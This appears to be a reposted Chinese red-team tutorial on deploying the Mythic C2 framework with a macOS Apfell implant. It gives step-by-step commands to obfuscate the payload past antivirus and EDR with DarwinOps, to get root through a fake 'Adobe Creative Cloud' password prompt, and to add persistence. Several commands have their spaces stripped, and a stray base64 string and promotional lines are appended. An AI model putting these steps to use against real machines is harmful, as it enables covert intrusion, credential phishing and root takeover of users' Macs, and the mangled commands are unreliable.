macOS红队实战：使用DarwinOps武装Mythic C2并获取Root权限

本文将探讨如何在macOS上设置Mythic C2及其Apfell攻击载荷。我们将使用BallisKit DarwinOps对该载荷进行武装化以绕过EDR。我们还将演示如何使用权限提升模块获取Root访问权限。

1. 验证依赖项

在开始之前，请确保您拥有构建mythic-cli所需的所有依赖项：

aptinstallmake-yaptinstallgit-y

2. 从GitHub下载Mythic

从GitHub克隆Mythic仓库并进入该目录：

sudogitclone https://github.com/its-a-feature/Mythic.gitcdMythic

3. 安装Docker和Docker Compose

Mythic需要Docker和Docker Compose来运行其服务。使用以下脚本之一安装Docker：

• Debian：./install_docker_debian.sh
• Kali Linux：./install_docker_kali.sh
• Ubuntu：./install_docker_ubuntu.sh

4. 构建Mythic-CLI

构建mythic-cli：

make

如果一切顺利，您应该会有一个可用的./mythic-cli文件。

5. 启动Mythic

现在脚本已执行，Mythic已准备好启动：

./mythic-cli start

提示：某些容器可能需要时间初始化并与其他服务通信。最初看到错误消息是常见的；重要的是所有容器都已启动，如下所示：

（此处为容器启动图片描述）

6. 配置

所有配置都可以通过.env文件或使用以下命令完成：

./mythic-cli config

如果C2服务器需要远程访问，您必须执行以下命令：

./mythic-cli configsetmythic_server_bind_localhost_onlyfalse&&./mythic-cli restart

您现在可以从服务器的IP地址访问UI面板。如果无法连接，请确保“BOUND LOCALLY”设置为false。

（此处为服务绑定状态图片描述）

通过以下地址访问Mythic UI：

https://127.0.0.1:7443/new/login

您应该会看到如下登录面板：

（此处为Mythic登录面板图片描述）

• 用户名：mythic_admin
• 密码：密码是自动生成的，可以在.env文件中找到。或者，使用命令：

  grep^MYTHIC_ADMIN_PASSWORD=.env|cut-d'='-f2

7. 安装Payload和C2Profile

登录后，进入Payloads部分：

（此处为Payloads和C2Profiles界面图片描述）

目前，没有任何安装。让我们安装我们的Payload和通信信道。

• 安装Apfell：这是用于macOS的Mythic Payload，使用JXA：

  sudo./mythic-cliinstallgithub https://github.com/MythicAgents/apfell

• 安装HTTP C2Profile：为了与我们的攻击植入程序通信，安装HTTP C2Profile：

  sudo./mythic-cliinstallgithub https://github.com/MythicC2Profiles/http

您现在应该看到：

（此处为Payload和C2Profiles下载完成图片描述）

8. 生成Apfell Payload

生成Apfell Payload：

（此处为生成新Payload界面图片描述）

1. 选择MacOS（如果Apfell是唯一安装的Payload，则应为默认选项）。
2. 选择Apfell（如果它是唯一安装的Payload，也是默认选项）。
3. 添加任何所需的命令（这些不会影响整体过程）。
4. 在选择C2 Profiles时，确保包含HTTP：

（此处为添加HTTP C2Profile图片描述）

验证参数是否匹配。默认情况下，它设置为https://和端口80。如果这些不一致，它将无法工作：

（此处为HTTP选项配置图片描述）

输入参数后，您可以下载Payload：

（此处为下载Payload界面图片描述）

9. 使用DarwinOps

现在您已经生成了Payload，防病毒程序可能会标记并删除它。因此，我们需要对其进行武装化。为此，我们将依赖DarwinOps，这是适用于MacOS的红队工具包！

使用以下命令行武装Apfell Payload：

./darwin_ops -G payload.app -i apfell.js --autopack --obfuscate

2. 执行生成的Payload：

./in_memory_exec.js

（此处为Payload执行图片描述）

如果您需要更高权限，可以使用权限提升模块将自己伪装成可信应用程序。

./darwin_ops -G privesc.app -i apfell.js --privesc --privesc-delay-execution10--privesc-prompt_app_name"Adobe Creative Cloud"--privesc-prompt-app-icon CreativeCloudApp.icns --autopack --obfuscate

（此处为Apple原生提示符被伪装成所选应用程序的图片描述）

被伪装成我们选择的应用的Apple原生提示符，但它将以root权限启动我们的Apfell植入程序。

（此处为Apfell植入程序以root权限运行的图片描述）

如您所见，我们通过植入程序获得了Root访问权限，DarwinOps还允许您通过其他模块添加持久性。FINISHED
CSD0tFqvECLokhw9aBeRqgJcKWJF+birK01iJlMQBy8dA/IoUmQ3a8NCV4f4/iDmWdrGlB1A+YwCQcYLk3pbu5V7iJKALOsEBgS+H36NPVXQ5dRIxJeywUbdYhy6nc3+JEcVMdU+0GYoG38+NOoYTQ==
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）